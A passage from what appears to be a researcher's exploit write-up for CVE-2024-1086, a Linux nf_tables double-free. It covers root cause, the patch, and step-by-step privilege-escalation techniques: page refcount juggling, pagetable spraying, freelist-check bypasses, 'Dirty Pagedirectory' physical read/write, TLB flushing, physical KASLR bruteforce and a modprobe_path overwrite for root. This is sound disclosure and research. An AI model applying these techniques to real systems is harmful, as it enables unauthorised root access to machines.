		verdict = nf_hook_entry_hookfn(&e->hooks[s], skb, state);

		switch (verdict & NF_VERDICT_MASK) {
		case NF_ACCEPT:
			break;  // go to next rule
		case NF_DROP:
			kfree_skb_reason(skb, SKB_DROP_REASON_NETFILTER_DROP);

			// check if the verdict contains a drop err
			ret = NF_DROP_GETERR(verdict);
			if (ret == 0)
				ret = -EPERM;

			// immediately return (do not evaluate other rules)
			return ret;

		// [snip] alternative verdict cases
		default:
			WARN_ON_ONCE(1);
			return 0;
		}
	}

	return 1;
}

Codeblock 3.1.1: The nf_hook_slow() kernel function written in C, which iterates over nftables rules.

3.2. Root cause analysis

The root cause of the bug is quite simple in nature: it is an input sanitization bug. The impact is a stable double-free primitive.

The important details of the dataflow analysis are that when creating a verdict object for a netfilter hook, the kernel allowed positive drop errors. This meant an attacking user could cause the scenario below, where nf_hook_slow() would free an skb object when NF_DROP is returned from a hook/rule, and then return NF_ACCEPT as if every hook/rule in the chain returned NF_ACCEPT. This causes the caller of nf_hook_slow() to misinterpret the situation, and continue parsing the packet and eventually double-free it.

// userland API (netlink-based) handler for initializing the verdict 
static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
			    struct nft_data_desc *desc, const struct nlattr *nla)
{
	u8 genmask = nft_genmask_next(ctx->net);
	struct nlattr *tb[NFTA_VERDICT_MAX + 1];
	struct nft_chain *chain;
	int err;

	// [snip] initialize memory

	// malicious user: data->verdict.code = 0xffff0000
	switch (data->verdict.code) {
	default:
		// data->verdict.code & NF_VERDICT_MASK == 0x0 (NF_DROP)
		switch (data->verdict.code & NF_VERDICT_MASK) {
		case NF_ACCEPT:
		case NF_DROP:
		case NF_QUEUE:
			break;  // happy-flow
		default:
			return -EINVAL;
		}
		fallthrough;
	case NFT_CONTINUE:
	case NFT_BREAK:
	case NFT_RETURN:
		break;  // happy-flow
	case NFT_JUMP:
	case NFT_GOTO:
		// [snip] handle cases
		break;
	}

	// successfully set the verdict value to 0xffff0000
	desc->len = sizeof(data->verdict);

	return 0;
}

Codeblock 3.2.1: The nft_verdict_init() kernel function written in C, which constructs a netfilter verdict object.

// looping over existing rules when skb triggers chain
int nf_hook_slow(struct sk_buff *skb, struct nf_hook_state *state,
         const struct nf_hook_entries *e, unsigned int s)
{
    unsigned int verdict;
    int ret;

    for (; s < e->num_hook_entries; s++) {
        // malicious rule: verdict = 0xffff0000
        verdict = nf_hook_entry_hookfn(&e->hooks[s], skb, state);  

        // 0xffff0000 & NF_VERDICT_MASK == 0x0 (NF_DROP)
        switch (verdict & NF_VERDICT_MASK) {  
        case NF_ACCEPT:
            break;
        case NF_DROP:
            // first free of double-free
            kfree_skb_reason(skb,
                     SKB_DROP_REASON_NETFILTER_DROP);  
            
            // NF_DROP_GETERR(0xffff0000) == 1 (NF_ACCEPT)
            ret = NF_DROP_GETERR(verdict);  
            if (ret == 0)
                ret = -EPERM;
            
            // return NF_ACCEPT (continue packet handling)
            return ret;  

        // [snip] alternative verdict cases
        default:
            WARN_ON_ONCE(1);
            return 0;
        }
    }

    return 1;
}

Codeblock 3.2.2: The nf_hook_slow() kernel function written in C, which iterates over nftables rules.

static inline int NF_HOOK(uint8_t pf, unsigned int hook, struct net *net, struct sock *sk, 
	struct sk_buff *skb, struct net_device *in, struct net_device *out, 
	int (*okfn)(struct net *, struct sock *, struct sk_buff *))
{
	// results in nf_hook_slow() call
	int ret = nf_hook(pf, hook, net, sk, skb, in, out, okfn);

	// if skb passes rules, handle skb, and double-free it
	if (ret == NF_ACCEPT)
		ret = okfn(net, sk, skb);

	return ret;
}

Codeblock 3.2.3: The NF_HOOK() kernel function written in C, which calls a callback function on success.

3.3. Bug impact & exploitation

As said in the subsection above, this bug leaves us with a very powerful double-free primitive when the correct code paths are hit. The double-free impacts both struct sk_buff objects in the skbuff_head_cache slab cache and the dynamically-sized sk_buff->head object, which ranges from kmalloc-256 up to order-4 pages directly from the buddy-allocator (65536 bytes) with IPv4 packets (perhaps even more with IPv6 jumbo packets?).

The sk_buff->head object is allocated through a kmalloc-like interface (kmalloc_reserve()) in __alloc_skb(). This allows us to allocate objects of a dynamic size: slab objects from size 256 up to full-on pages of 65536 bytes from the buddy allocator. A functional overview of this can be found in the page allocation subsection of the background info section.

The size of the sk_buff->head object is directly influenced by the size of the network packet, as this object contains the packet content. Hence, if we send a packet with e.g. 40KiB data, the kernel would allocate an order 4 page directly from the buddy-allocator.

When you try to reproduce the bug yourself, the kernel may panic, even with all mitigations disabled. This is because certain fields of the skb - such as pointers - get corrupted when the skb is freed. As such, we should avoid usage of these fields. Fortunately, I found a way to bypass all usage which could lead to a panic or other errors, and to get a highly reliable double-free primitive. I'm highlighting this in the respective subsection within the proof-of-concept section.

3.4. Bug fixes

When I reported the bug to the kernel developers, I proposed my own bug fix which regretfully had to introduce a specific breaking change in the middle of the netfilter stack.

Thankfully, one of the maintainers of the subsystem came up with their own elegant fix. Their fix sanitizes verdicts from userland input in the netfilter API itself, before the malicious verdict is even added. The specific fix makes the kernel disallow drop errors entirely for userland input. The maintainer mentions however that if this behaviour is needed in the future, only drop errors with n <= 0 should be allowed to prevent bugs like these. This is because positive drop errors like 1 will overlap as NF_ACCEPT.

Additionally, the vulnerability was assigned CVE-2024-1086 (this was before the Linux kernel became a CNA and ruined the meaning of CVEs).

A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.

The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.

We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.

Codeblock 3.4.1: The description of CVE-2024-1086.

--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -10988,16 +10988,10 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
 	data->verdict.code = ntohl(nla_get_be32(tb[NFTA_VERDICT_CODE]));
 
 	switch (data->verdict.code) {
-	default:
-		switch (data->verdict.code & NF_VERDICT_MASK) {
-		case NF_ACCEPT:
-		case NF_DROP:
-		case NF_QUEUE:
-			break;
-		default:
-			return -EINVAL;
-		}
-		fallthrough;
+	case NF_ACCEPT:
+	case NF_DROP:
+	case NF_QUEUE:
+		break;
 	case NFT_CONTINUE:
 	case NFT_BREAK:
 	case NFT_RETURN:
@@ -11032,6 +11026,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
 
 		data->verdict.chain = chain;
 		break;
+	default:
+		return -EINVAL;
 	}
 
 	desc->len = sizeof(data->verdict);
-- 

Codeblock 3.4.2: C code diff of the nft_verdict_init() kernel function being patched against the bug.

You can learn more about their fix on the kernel lore website: "[PATCH nf] netfilter: nf_tables: reject QUEUE/DROP verdict parameters."

4. Techniques

4.1. Page refcount juggling

The first technique required for the exploit is juggling page refcounts. When we attempt to double-free a page in the kernel using the dedicated API functions, the kernel will check the refcount of the page:

void __free_pages(struct page *page, unsigned int order)
{
	/* get PageHead before we drop reference */
	int head = PageHead(page);

	if (put_page_testzero(page))
		free_the_page(page, order);
	else if (!head)
		while (order-- > 0)
			free_the_page(page + (1 << order), order);
}

Codeblock 4.1.1: C code of the __free_pages() kernel function with original comments.

The refcount is usually 1 before we free the page (unless it is shared, in which case it is higher). If the page's refcount is not 0 after it is decremented, put_page_testzero() will return false and the page will not be freed. This means that we shouldn't be able to double-free pages... unless?

Attentive readers will notice that several child-pages will then be freed until order-- == 0. However, after the first page free, the page order is set to 0. Hence, during the 2nd free where said code runs, no pages will be freed since the loop condition is immediately false. The fact that the page order gets set to 0 after a page free will be abused to convert the double-freed pages to order 0 in the "Setting page order to 0" technique section.

In the context of a double-free: when we free the page for the 1st time, the refcount will be decremented to 0, and hence the page will be freed as the code above allows it. However, when we try to free the page a 2nd time, the refcount will be decremented to -1 and the page will not be freed, since the refcount != 0. This may even raise a BUG() if CONFIG_DEBUG_VM is enabled.

So, how do we double-free pages then? Simple: allocate the page again before the 2nd free, so that the free looks like a regular, non-double free, considering there is an actual object in the page. This can be any object of the same size, such as a slab or a pagetable, which is what the exploit utilizes.

In the most simplistic form, the implementation of this technique will look like this:

static void kref_juggling(void)
{
    struct page *skb1, *pmd, *pud;

    skb1 = alloc_page(GFP_KERNEL);  // refcount 0 -> 1
    __free_page(skb1);  // refcount 1 -> 0
    pmd = alloc_page(GFP_KERNEL);  // refcount 0 -> 1
    __free_page(skb1);  // refcount 1 -> 0
    pud = alloc_page(GFP_KERNEL);  // refcount 0 -> 1

    pr_err("[*] skb1: %px (phys: %016llx), pmd: %px (phys: %016llx), pud: %px (phys: %016llx)\n", skb1, page_to_phys(skb1), pmd, page_to_phys(pmd), pud, page_to_phys(pud));
}

Codeblock 4.1.2: C code of a custom kernel module, containing comments describing page refcounts.

In terms of cleaning this up post-exploitation, it's incredibly easy: just free both objects at will, as the kernel will refuse to double-free the page because of the refcount. :-)

4.2. Page freelist entry order 4 to order 0

When an allocation happens through __do_kmalloc_node() (such as for skb data), the size of the allocated object is checked against KMALLOC_MAX_CACHE_SIZE (the maximum slab-allocator size). If the object is larger than that, one of the page allocators will be used instead of the slab-allocator. This is useful when we want to deterministically free pages like the skb data and allocate pages like PTE pages using the same algorithms and freelists. However, the value of KMALLOC_MAX_CACHE_SIZE is equivalent to PAGE_SIZE * 2, which means that kmalloc will only use the page allocators for allocations above order 1 (2 pages, or 8192 bytes).

Unfortunately enough, some objects we may want to target are exclusively allocated by page allocators whilst still falling within the size range of the slab-allocator. For example, a developer may use alloc_page() instead of kmalloc(4096), because this saves overhead. An example of this is a PTE page (or any other pagetable page, for that matter), which uses page allocations of order 0 (1 page, or 4096 bytes).

If we were to double-free an object of 4096 bytes (an order==0 page) handled by the slab-allocator, it would end up in the slab caches, not in the page freelists. Hence, in order to double-alloc pages in the order==0 freelist, we need to convert the order-4 (16 pages) freelist entries from our double-free into order-0 (1 page) freelist entries.

Luckily, I found 2 methods to allocate order==0 pages into order==4 page freelist entries.

4.2.1. Draining the PCP list

This method takes advantage of the fact that the PCP-allocator is basically a set of per-CPU freelists for the buddy-allocator. When one of those PCP freelists are empty, it will refill pages from the buddy-allocator.

For a functional overview of the page allocation process (including if statements, and the slab-allocator and buddy-allocator), check the page allocation subsection in the background section.
Illustration 4.2.1.1: Timeline of memory operations to set a page order to 0.

The refill happens in bulks of count page objects. Hence, the function rmqueue_bulk() (which is used for the refill) allocates count pages of order order from the buddy-allocator. When allocating a page from the buddy-allocator, it will traverse the buddy page freelists, and if a buddy freelist entry's order >= order, it will return this page for the refill. If the buddy freelist entry's order > order, the buddy-allocator will internally split the page.

Notice that our exploit double-frees order==4 pages, and needs to fill those with order==0 PCP pages. When we free it, the order==4 page is added to the buddy freelist. For our exploit we want to place order==0 pages into these 16 pages, because the order==4 page will be double-freed. The allocation of order==0 pages happens via the PCP allocator, which has per-order freelists. However, the PCP-refill mechanism will take any buddy page if it fits. Hence, we can allocate 16 PTE pages into the double-freed order==4 page.

As said, in order to trigger this mechanism we must first drain the PCP freelist for the target CPU by spraying page allocations. In my exploit, I do this by spraying PTE pages, which is directly related to the Dirty Pagedirectory technique. Because we cannot tell if the PCP freelist was drained, we need to assume one of the sprayed objects is allocated in the double-free object. Hence, I spray PTE pages so that a PTE page takes the spot of one of the double-freed buddy pages. If I wanted to allocate a PMD page, I would spray PMD pages, et cetera.

The amount of objects in the freelists differs per system and per resource usage. For the exploit, I used 16000 PTE objects, which was - in all cases I encountered - enough to empty the freelist.

static int rmqueue_bulk(struct zone *zone, unsigned int order,
			unsigned long count, struct list_head *list,
			int migratetype, unsigned int alloc_flags)
{
	unsigned long flags;
	int i;

	spin_lock_irqsave(&zone->lock, flags);
	for (i = 0; i < count; ++i) {
		struct page *page = __rmqueue(zone, order, migratetype, alloc_flags);
		if (unlikely(page == NULL))
			break;

		list_add_tail(&page->pcp_list, list);
		// [snip] set stats
	}

    // [snip] set stats
	spin_unlock_irqrestore(&zone->lock, flags);

	return i;
}

Codeblock 4.2.1.2: C code of the rmqueue_bulk() kernel function, which refills the PCP freelist.

4.2.2. Race condition (obsolete)

>> This technique is obsolete, but was used for kernelctf exploit <<

The first free() appends the page to the correct freelist, and sets the page order to 0. However, when doing a double-free (the 2nd free), the page will be added to the freelist for order 0, since that is now the recorded order for that page. This way, we can add order==4 pages to the order==0 freelists with a double-free primitive.

Illustration 4.2.2.1: Timeline of memory operations to set a page order to 0.

Less luckily, this technique is a race condition. When a page is freed for the 2nd time without an intervening alloc (free; free; alloc; alloc), the refcount of the page will drop below 0 and the double-free will not be allowed, so we need to do page refcount juggling (free; alloc; free; alloc). However, then the order will not be 0 at the 2nd free, because the alloc resets the order to the original value (i.e. order 4). Now, converting the page to order 0 seems impossible, since we either get no free at all (refcount -1), or a page of the original order (the proper scenario). Enter: the race condition.

When a page is freed, its order is passed by value. This means that if the double-freed page gets allocated during the 2nd free, it will be freed to the order-0 freelist and will have its refcount incremented, so the refcount will not hit -1 and will be 0 as it should be. As you can imagine, the race window is quite small, since it consists of a few function calls. However, the free_large_kmalloc() function prints a kernel WARN() to dmesg if the order is 0, which it is because of the double-free. Usually, this only provides 1ms for the window, but on virtualized systems like QEMU VMs with serial terminals, the window is 50ms-300ms, which is more than enough to hit.

Now we have successfully attached the page to the order-0 freelist, which means that we can overwrite the page with any order-0 page allocation. We can also convert the 1st page reference (acquired with the 1st free) by freeing that object and reallocating it as a new object, since the page order will persist. If we are using page refcount juggling, we want to free the object which took the first freed reference.

4.3. Freeing skb instantly without UDP/TCP stacks

When we are avoiding freelist corruption checks, we may want to free a given skb at will at an arbitrary time, so our exploit can work in a fast, synchronous manner with less chance of corruption.

Note that this would typically be done with local UDP packets, but the skb gets corrupted after the first free in the double-free, which means I cannot use the TCP or UDP stacks for this, as they utilize the corrupted fields.
OBSOLETE (KERNELCTF EXPLOIT): Alternatively, we may want to free a certain skb on a specific CPU to bypass double-free detection, since the sk_buff freelist is per-CPU. This means that if we double-free an object across 2 CPUs directly after each other, the double-free will not be detected. We cannot "shoot the previous skb to the moon" (a.k.a. allocate a never-expiring skb) to prevent double-free detection, since this would alter the skb head pages by either changing the pointer, or by allocating the same pointer from the freelist, preventing a double-free anyway.

Fortunately, IP packet fragmentation and its fragment queues exist. When an IP packet is waiting for all its fragments to be received, the fragments are placed into an IP frag queue (a red-black tree). When the received fragments add up to the expected length of the full IP packet, the packet is reassembled on the CPU the last fragment came in on. Please note that this IP frag queue has a timeout of ipfrag_time seconds, after which all its skb's are freed. Changing this timeout is covered in the subsection hereafter.

If we wanted to switch skb freelist entry skb1 from CPU 0's freelist to CPU 1's, we would allocate it as an IP fragment in a new IP frag queue on CPU 0. Then, we send skb2 - the final IP fragment for the queue - on CPU 1. This causes skb1 to be freed on CPU 1.

This same behaviour can be used to free skb's at will, without using UDP/TCP code. This is beneficial for the exploit, since the double-free packet is corrupted when it is freed for the first time. If we used UDP code, the kernel would panic due to all sorts of nasty behaviour.

Illustration 4.3.1: Timeline of activities to switch an skb's per-CPU freelist.

Unfortunately, the IP fragment queue's final size is determined by skb->len, which is effectively randomized after the free because it overlaps with the slab cache's obfuscated freelist pointer (encoded using s->random). For details, check the next subsection. This means it is practically impossible to complete the IP frag queue consistently, because it will use a random expected length.

Hence, I came up with a different strategy: instead of completing the IP frag queue, we make it raise an error using invalid input. This causes all skb's in the IP frag queue to be freed instantly on the CPU of the erroring skb, regardless of skb->len.

When implementing this technique yourself, note that double-free detection (CONFIG_SLAB_FREELIST_HARDENED) will be triggered if you do not insert "innocent" skb objects between the free of skb1 and the alloc of skb2. For demonstrative purposes these have been left out of the diagram, but they are included in the PoC sections.

4.3.1. Modifying skb max lifetime

For our exploit, we may want skb's to live shorter or longer, depending on the use case. Luckily, the kernel provides a userland interface to configure the IP fragment queue timeout at /proc/sys/net/ipv4/ipfrag_time. This is per network namespace, and can hence be set by an unprivileged user in their own network namespace.

When we use IP fragments to reassemble a split IP packet, the kernel will wait ipfrag_time seconds before issuing a timeout. If we set ipfrag_time to 999999 seconds, the kernel will let the fragment skb live for 999999 seconds. Conversely, we can also set it to 1 second if we want to swiftly allocate and deallocate an skb on a random CPU.

static void set_ipfrag_time(unsigned int seconds)
{
	int fd;
	
	fd = open("/proc/sys/net/ipv4/ipfrag_time", O_WRONLY);
	if (fd < 0) {
		perror("open$ipfrag_time");
		exit(1);
	}

	dprintf(fd, "%u\n", seconds);
	close(fd);
}

Codeblock 4.3.1.1: C code of a userland function to set the ipfrag_time variable.

4.4. Bypassing KernelCTF skb corruption checks

The only mitigation I had to actively bypass on the KernelCTF mitigation instance was the freelist corruption check, specifically the one that checks whether the freelist next ptr in an object being allocated is corrupted.

Unfortunately, the freelist next ptr overlaps with skb->len, since skbuff_head_cache->offset == 0x70. This means that the next freelist entry pointer is stored at sk_buff+0x70, which coincidentally overlaps with skb->len. Online sources told me s->offset is usually set to half the slab size by kernel developers to prevent OOB writes from being able to overwrite freelist pointers, which in the past led to easy privesc using OOB bugs.

After the 1st skb free, the skb->len field gets overwritten with a partial next ptr value. In the code leading up to skb's 2nd free, the skb->len field gets modified because of packet parsing. Hence, the freelist next ptr gets corrupted even before the 2nd skb free.

When we try to allocate the freelist entry of the 1st skb free (after said corruption) using slab_alloc_node(), the freelist next ptr in the freed object gets flagged for corruption in calls invoked by freelist_ptr_decode():

static inline bool freelist_pointer_corrupted(struct slab *slab, freeptr_t ptr,
	void *decoded)
{
#ifdef CONFIG_SLAB_VIRTUAL
	/*
	 * If the freepointer decodes to 0, use 0 as the slab_base so that
	 * the check below always passes (0 & slab->align_mask == 0).
	 */
	unsigned long slab_base = decoded ? (unsigned long)slab_to_virt(slab) : 0;

	/*
	 * This verifies that the SLUB freepointer does not point outside the
	 * slab. Since at that point we can basically do it for free, it also
	 * checks that the pointer alignment looks vaguely sane.
	 * However, we probably don't want the cost of a proper division here,
	 * so instead we just do a cheap check whether the bottom bits that are
	 * clear in the size are also clear in the pointer.
	 * So for kmalloc-32, it does a perfect alignment check, but for
	 * kmalloc-192, it just checks that the pointer is a multiple of 32.
	 * This should probably be reconsidered - is this a good tradeoff, or
	 * should that part be thrown out, or do we want a proper accurate
	 * alignment check (and can we make it work with acceptable performance
	 * cost compared to the security improvement - probably not)?
	 */
	return CHECK_DATA_CORRUPTION(
		((unsigned long)decoded & slab->align_mask) != slab_base,
		"bad freeptr (encoded %lx, ptr %p, base %lx, mask %lx",
		ptr.v, decoded, slab_base, slab->align_mask);
#else
	return false;
#endif
}

Codeblock 4.4.1: C code of the kernel function freelist_pointer_corrupted() (KernelCTF mitigation instance), including the original comments.

After some research, I figured out that this check is not run retroactively: when we free an object on top of the object with a corrupted freelist entry, the mitigation does not check whether the previous object has a corrupted next ptr. This means that we can mask an invalid next ptr by freeing another skb after it, and then allocating that skb again with the data of the old skb. This essentially masks the original corrupted skb, whilst still allowing us to double-alloc the skb data.

The diagram below tries to explain this phenomenon by performing a double-free on an skb object like the exploit in this blogpost.

Illustration 4.4.2: Sequence overview of bypassing the freelist corruption detection in the KernelCTF mitigation kernel.

The KernelCTF devs could mitigate this by checking the freelist head next ptr for corruption when freeing, not only when allocating.

4.5. Dirty Pagedirectory

4.5.1. The train of thought

Dirty Pagetable is one of the most interesting techniques I have encountered so far. When I was researching ready-made techniques to exploit the double-free bug, Dirty Pagetable came to the surface, and it seemed like a perfect technique.

However, I realized that reliably writing to the PTE page would be an unpleasant experience in the context of my double-free bug. I was unable to find any page-sized objects which could be fully overwritten with userdata whilst also being allocated from the same page freelist as the PTE pages. I did not want to use cross-cache attacks for stability and compatibility reasons, as this would introduce more complexity into the exploit.

Next came a night full of brainstorming which gave me the following idea: considering I have a double-free in the same freelist as PTEs - what if it were possible to double-allocate PTEs across processes, such as sudo and the exploit? This would essentially perform memory sharing (pointing the exploit's virtual addresses to sudo's physical addresses) between two completely unrelated processes. Hence, it would presumably be possible to manipulate the application data of a process running as root, and leverage that for a root shell. This turned out to be a bit impractical, considering other allocations happen as a process gets started, so it would require very precise position management on the freelist.

This gave me the next idea: what if it were possible to double-allocate the same page as both an exploit PTE page and an exploit PMD page? The PMD would then interpret the PTE's entries as its own, meaning it dereferences the PTE's userland pages as if they were PTE tables.

Fortunately enough, this PMD+PTE approach works. Alternatives such as PUD+PMD have been confirmed to work as well, and perhaps PGD+PUD works too. The only difference is the amount of memory simultaneously mirrored: 1GiB with PMD+PTE, 512GiB with PUD+PMD, and presumably 256TiB with PGD+PUD (if this is even possible). Keep in mind that this impacts memory usage, and the system may go OOM with too much memory mirrored.

Additionally, the integration of Dirty Pagedirectory needs to be considered when choosing between PMD+PTE and PUD+PMD. I explain this in the PTE spraying section, but in general PMD+PTE should be the best choice.

4.5.2. The technique

The Dirty Pagedirectory technique allows unlimited, stable read/write to any memory page based on physical addresses. It can bypass permissions by setting its own permission flags. This allows our exploit to write to read-only pages like those containing modprobe_path.

In this section I explain PUD+PMD, but it boils down to the same as the PMD+PTE strategy from the PoC exploit.

The technique is quite simple in nature: allocate a Page Upper Directory (PUD) and a Page Middle Directory (PMD) at the same kernel address using a bug like a double-free. The VMAs should be separate, to avoid conflicts (a.k.a. do not allocate the PMD within the area of the PUD). Then, write an address to a page in the PMD range and read the address at the corresponding page of the PUD range. The diagram below tries to explain this phenomenon (complementary to the example under it).

Illustration 4.5.2.1: Hierarchy overview of the Dirty Pagedirectory technique, including required memory operations.

To make things more hands-on, let's imagine the following scenario: the infamous modprobe_path variable is stored in a page at PFN/physical address 0xCAFE1460. We apply Dirty Pagedirectory: double-allocate the PUD page and PMD page via mmap for respective userland VMA ranges 0x8000000000 - 0x10000000000 (mm->pgd[1]) and 0x40000000 - 0x80000000 (mm->pgd[0][1]).

This automatically means that mm->pgd[1][x][y] is always equal to mm->pgd[0][1][x][y], because both mm->pgd[1] and mm->pgd[0][1] refer to the same page, as we double-allocated it. Observe that mm->pgd[0][1][x][y] is a userland page, and that mm->pgd[1][x][y] is a PTE. This means the dedicated PUD area will interpret a userland page from the PMD area as a PTE.

Now, to read physical address 0xCAFE1460 we set the first entry of the PUD area's PTE to 0x80000000CAFE1867 (the page address with added PTE flags) by writing that value to 0x40000000 (a.k.a. the userland address for the page @ mm->pgd[0][1][0][0]+0x0). Because of the entanglement rule above, this means we wrote that value to the PTE entry for the page @ mm->pgd[1][0][0]+0x0, since mm->pgd[1][0][0] == mm->pgd[0][1][0][0]. Now, we can dereference that malicious PTE value by reading page mm->pgd[1][0][0][0] (last index 0 since we wrote it to the first 8 bytes of the PTE: notice the 0x0 above). This is equal to userland page 0x8000000000.

Because the PTE has now been changed from userland, we need to flush the TLB, since it will contain an outdated entry. Once that's done, printf("%s", (char*)0x8000000460); should print /sbin/modprobe or whatever value modprobe_path has. Naturally, we can now overwrite modprobe_path by doing strcpy((char*)0x8000000460, "/tmp/privesc.sh"); (there are KMOD_PATH_LEN bytes of padding) and drop a root shell. This does not require another TLB flush, because the PTEs themselves do not change when writing to the address.

Observe how we set the read/write flags in PTE value 0x80000000CAFE1867. Note that the 0x8 in virtual address 0x8000000460 and the one in PTE value 0x80000000CAFE1867 have nothing to do with each other: in the PTE value it is a flag that is turned on, whilst the virtual address just happens to start with 0x8.

This boils down to: write PTE values to userland pages in the VMA range of 0x40000000 - 0x80000000, and dereference them by reading and writing corresponding userland pages in the VMA range of 0x8000000000 - 0x10000000000.

4.5.3. The mitigations

I have used this technique to bypass many of the mitigations currently in the kernel (among others: virtual KASLR, KPTI, SMAP, SMEP, and CONFIG_STATIC_USERMODEHELPER), albeit the remaining mitigations are bypassed in the PoC exploit with a little redneck engineering.

When this technique was peer-reviewed I got asked how it was able to bypass SMAP. The answer is quite simple: SMAP only works with virtual addresses, not with physical addresses. PTEs are referred to in PMDs by their physical address. This means that when a PTE entry in a PMD points to a userland page, SMAP will not catch it, because no userland virtual address is being dereferenced. Hence, the PUD area can happily use the userland page as a PTE without SMAP interference.

It would be possible to mitigate this technique by encoding a table entry's level type into the entry itself, and using it to detect when a PMD is allocated in place of a PUD, since we cannot forge PMD and PUD entries themselves. An example is setting type 0 for PTEs, 1 for PMDs, 2 for PUDs, 3 for P4Ds, 4 for PGDs, et cetera. However, this would require log2(levels) bits in each table entry (3 bits when P4D is enabled, since levels=5), which would sacrifice space intended for future features, and the runtime checks would presumably introduce a great deal of overhead, since every level of every memory access has to be checked. Additionally, this mitigation would still allow forced memory sharing (i.e. overlapping an exploit PTE page with a PTE page of sudo, running as root).

4.6. Spraying pagetables for Dirty PD

You may notice that the Dirty Pagedirectory section above mentions PUD+PMD, but the proof-of-concept uses PMD+PTE. This is related to the fact that the exploit drains the PCP list to allocate a PTE at the double-freed address.

First off, pagetables are allocated by the kernel on demand: when we mmap a virtual memory area, no allocation happens yet. Only when we actually read/write the VMA will the kernel allocate the pagetables required for the accessed page. When a PUD is allocated for an access, for instance, the PMD, PTE, and userland page are allocated along with it. When a PTE is allocated, the target userland page is allocated as well.

The original Dirty Pagetable paper mentions that - very elegantly - you can spray specific pagetable levels by allocating the parents first, since a parent (i.e. PMD) contains 512 children (PTEs). Hence, if we wanted to spray 4096 PTEs, we would need to pre-allocate 8 (4096/512 = 8) PMDs, before allocating the PTEs.

If we spray PMDs, the PTEs will be allocated as well - from the same freelist. This means that 50% of the spray is PMDs, and 50% is PTEs. If we were to spray PUDs, it would be 33% PUDs, 33% PMDs, and 33% PTEs. If we spray PTEs, however, the spray is 100% PTEs, since we are not doing any other allocations. Because of this, we use PMD+PTE in the exploit and not PUD+PMD, as spraying PMDs would mean a 50% less effective spray, and hence less stability.

Note that userland pages themselves are allocated from a different freelist (migratetype 0, not migratetype 1).

4.7. TLB Flushing

TLB flushing is the practice of removing or invalidating all entries in the translation lookaside buffer (which caches virtual-to-physical address translations). In order to scan addresses reliably using the Dirty Pagedirectory technique, we need to come up with a TLB flushing technique that satisfies the following requirements:

  • Does not modify existing process pagetables
  • Has to work 100% of the time
  • Has to be quick
  • Can be triggered from userland
  • Has to work regardless of PCID

Based upon these requirements I came up with the following idea: when allocating the PMD and PTE memory areas, mark them as shared, then fork() the process, make the child munmap() them to trigger a flush, and make the child go to sleep (to avoid crashes if the underlying exploit is unstable). The result is the following function:

static void flush_tlb(void *addr, size_t len)
{
	short *status;

	status = mmap(NULL, sizeof(short), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	
	*status = FLUSH_STAT_INPROGRESS;
	if (fork() == 0)
	{
		munmap(addr, len);
		*status = FLUSH_STAT_DONE;
		PRINTF_VERBOSE("[*] flush tlb thread gonna sleep\n");
		sleep(9999);
	}

	SPINLOCK(*status == FLUSH_STAT_INPROGRESS);

	munmap(status, sizeof(short));
}

Codeblock 4.7.1: C code of a userland function which flushes the TLB for a certain virtual memory range.

The locking mechanism prevents the parent from continuing execution before the child has flushed the TLB. It could presumably be removed if the child performed a process exit instead of sleeping, as the parent could monitor the child's process state.

This TLB flushing method has worked 100% of the time to refresh pagetables and pagedirectories. It has been tested on a recent AMD CPU and in QEMU VMs. It should be hardware-independent, since the flush HAS to be triggered from the kernel in this usecase.

4.8. Dealing with physical KASLR

Physical Kernel Address Space Layout Randomization (Physical KASLR) is the practice of randomizing the physical base address of the Linux kernel. Usually, this is not important since nearly all exploits work with virtual memory (and therefore have to deal with virtual KASLR).

However, because of the nature of our exploit - which utilizes Dirty Pagedirectory - we need to have the physical address of the memory we want to read/write to.

4.8.1. Getting the physical kernel base address

Usually, this means we would need to bruteforce the entire physical memory range to find the physical target address.

Physical memory refers to all forms of usable physical memory addresses: e.g. on a laptop, a 16GiB RAM stick + 1GiB built-in MMIO = 17GiB of physical memory on the device.

However, one of the quirks of the Linux kernel is that the physical kernel base address has to be aligned to CONFIG_PHYSICAL_START (i.e. 0x100'0000 a.k.a. 16MiB) bytes if CONFIG_RELOCATABLE=y. If CONFIG_RELOCATABLE=n, the physical kernel base address will be exactly at CONFIG_PHYSICAL_START. For this technique, we assume CONFIG_RELOCATABLE=y, since it would not make sense to bruteforce physical KASLR if we knew the address.

If CONFIG_PHYSICAL_ALIGN is set, this value will be used for the alignment instead of CONFIG_PHYSICAL_START. Note that CONFIG_PHYSICAL_ALIGN is usually smaller, like 0x20'0000 a.k.a. 2MiB, which means more addresses need to be bruteforced (8 times more than with an alignment of 0x100'0000).

Assuming the target device has 8GiB physical memory, we can reduce our search area to 8GiB / 16MiB = 512 possible physical kernel base addresses, since we know the base address has to be aligned to CONFIG_PHYSICAL_START bytes. The advantage is that we only have to compare the first few bytes of the first page of each of the 512 addresses to determine whether that page is the kernel base.

We can essentially figure out the physical kernel base address by bruteforcing a few hundred physical addresses. Fortunately, Dirty Pagedirectory allows unlimited reads/writes of entire pages, and hence lets us read 4096 bytes per physical (page) address - and even more fortunately, 512 page addresses per PTE overwrite. This means we only have to overwrite the PTE once to figure out the physical kernel base address if our machine has 8GiB memory.

In order to properly recognize which of those 512 physical addresses contains the kernel base, I have written get-sig: a few Python scripts to generate a giant memcmp-powered if statement which finds overlapping bytes between different kernel dumps.

4.8.2. Getting the physical target address

Once we find the physical base address, we can find the final target address of our read/write operation - if it resides within the kernel area - using hardcoded offsets from the physical kernel base, or by scanning the ~80MiB physical kernel memory area for data patterns of the target.

The data scanning technique requires 1 + 80MiB/2MiB ≈ 41 PTE overwrites on a system with 8GiB memory. If we have access to Dirty Pagedirectory and the format of the target data is unique (like modprobe_path's buffer), the data-pattern scanning method is preferable due to broader compatibility across kernel versions, especially if we do not know the offsets when compiling the exploit.

